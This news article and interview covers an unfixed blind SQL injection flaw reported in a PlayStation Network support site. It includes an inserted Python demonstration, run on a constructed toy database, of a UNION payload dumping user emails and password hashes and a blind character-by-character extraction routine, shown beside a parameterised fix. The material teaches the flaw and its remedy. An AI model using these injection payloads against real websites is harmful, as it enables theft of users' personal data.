SQLi Vulnerability In PlayStation Network Allows Access To User Data


Security researcher Aria Akhavan has identified an SQL injection vulnerability in a PlayStation Network website that allows an attacker to access user data. Akhavan informed Sony two weeks ago, but the flaw has not yet been fixed.

About The Attack
The attack abuses a function on Sony's support website. By manipulating a parameter in the URL, an attacker can make the page display content from the SQL database directly in the browser.
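As an added illustration (not code from the article, from the researcher or from Sony's site), the following Python script reproduces the shape of the flaw described above on a constructed toy database: a support-page handler pastes the URL parameter into its query text, so an attacker can either pull rows from another table straight into the page with a UNION, or, when nothing useful is echoed, infer them one yes/no answer at a time (the blind variant the interview mentions). Beside it is the parameterised handler that stops both. The table names, sample rows, character set and function names are all invented for the example.

```python
"""Added example, not code from the Effect Hacking article or from Sony:
a toy support-site lookup with a URL parameter concatenated into SQL,
beside its parameterised fix. Schema, data and names are constructed."""
import sqlite3

# Constructed sample data: a public articles table and a users table
# that the lookup page was never meant to expose.
SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT);
INSERT INTO articles VALUES (1, 'Resetting your password');
INSERT INTO articles VALUES (2, 'Two-step verification');
INSERT INTO users VALUES (1, 'alice@example.com', 'hash-a1');
INSERT INTO users VALUES (2, 'bob@example.com', 'hash-b2');
"""

# Characters the blind extraction tries at each position (constructed).
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789@.-_"


def connect():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, article_id):
    """Flawed handler: the raw URL parameter is pasted into the SQL text,
    so whatever the attacker puts in ?id= becomes part of the query."""
    sql = "SELECT title FROM articles WHERE id = " + article_id
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, article_id):
    """Fixed handler: validate the type, then bind the value as a parameter.
    The driver never treats a bound value as SQL syntax."""
    try:
        value = int(article_id)
    except ValueError:
        return []
    rows = conn.execute("SELECT title FROM articles WHERE id = ?", (value,))
    return [row[0] for row in rows]


def union_attack(lookup, conn):
    """In-band injection: a UNION makes the handler render rows from the
    users table where article titles should be (content shown in the page)."""
    payload = "0 UNION SELECT email || ':' || password_hash FROM users"
    return lookup(conn, payload)


def blind_extract_email(lookup, conn, user_id, max_len=64):
    """Boolean-based blind injection: the page only reveals whether article 1
    was returned, so each request asks one yes/no question about one
    character and reads the answer from that presence or absence."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            payload = (f"1 AND (SELECT substr(email, {pos}, 1) FROM users "
                       f"WHERE id = {user_id}) = '{ch}'")
            if lookup(conn, payload):      # article 1 came back: guess was right
                recovered += ch
                break
        else:
            return recovered               # no character matched: end of string
    return recovered


if __name__ == "__main__":
    db = connect()
    print("normal request:      ", vulnerable_lookup(db, "1"))
    print("UNION, vulnerable:   ", union_attack(vulnerable_lookup, db))
    print("blind, vulnerable:   ", blind_extract_email(vulnerable_lookup, db, 1))
    print("UNION, parameterised:", union_attack(safe_lookup, db))
    print("blind, parameterised:", repr(blind_extract_email(safe_lookup, db, 1)))
```

Against the vulnerable handler the UNION payload returns both users' e-mail and hash columns in the article list, and the blind routine recovers a full e-mail address using nothing but the presence or absence of article 1 in each response. Against the parameterised handler both payloads fail type validation and, even if a numeric-looking value were bound, the driver would pass it as data rather than query text.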

Effect Hacking contacted security researcher Aria Akhavan for an exclusive interview.

Interview:
Aria Akhavan is a 20-year-old student from Vienna, Austria. He started penetration testing five years ago and has discovered vulnerabilities in ebay.com, Avast.com and many other websites.


Effect Hacking: Explain the vulnerability you found in the PlayStation Network.

Aria Akhavan: The vulnerability is a blind SQL injection which allows me to use SQL queries to get information out of the database.

Effect Hacking: Is it fixed?

Aria Akhavan: Not yet.

Effect Hacking: Do you use any special tools?

Aria Akhavan: The only tool I ever used was actually a specially made text browser.

Effect Hacking: How long have you been bug hunting?

Aria Akhavan: Actually, I started reporting security vulnerabilities in July 2014, but I had actually been in the background gathering my information for about five years.

Effect Hacking: What was your first finding, and how did you feel at that time?

Aria Akhavan: My first finding which I actually reported was Trustedshops. If I remember right, this vulnerability was an SSRF and a cross-frame scripting attack. The feeling was actually a mix of happiness and, somehow, sadness. I actually expected more security on websites that big.

Effect Hacking: How much have you earned so far from bug hunting?

Aria Akhavan: That's a good question. Actually, this is something I want to keep private.

Effect Hacking: Do you have a website?

Aria Akhavan: Actually, I am working on one; I never thought I would reach a point where I would need one.

Effect Hacking: What vulnerabilities have you discovered so far in your career as a bug hunter?

Aria Akhavan: Well, there are a lot, but the ones I liked the most have been PlayStation, ebay.com and Avast.com.

Effect Hacking: What are your future plans?

Aria Akhavan: Actually, my future plan is to get people to wake up. People trust big companies way too much and don't learn from mistakes. This is the second time the PlayStation Network could have leaked data. Why is there no place people can report something to? Also, why isn't there one single working e-mail address on the PlayStation site? Companies should also start letting penetration testers have a look for bugs in their applications. My goal is just to accomplish a safer net.
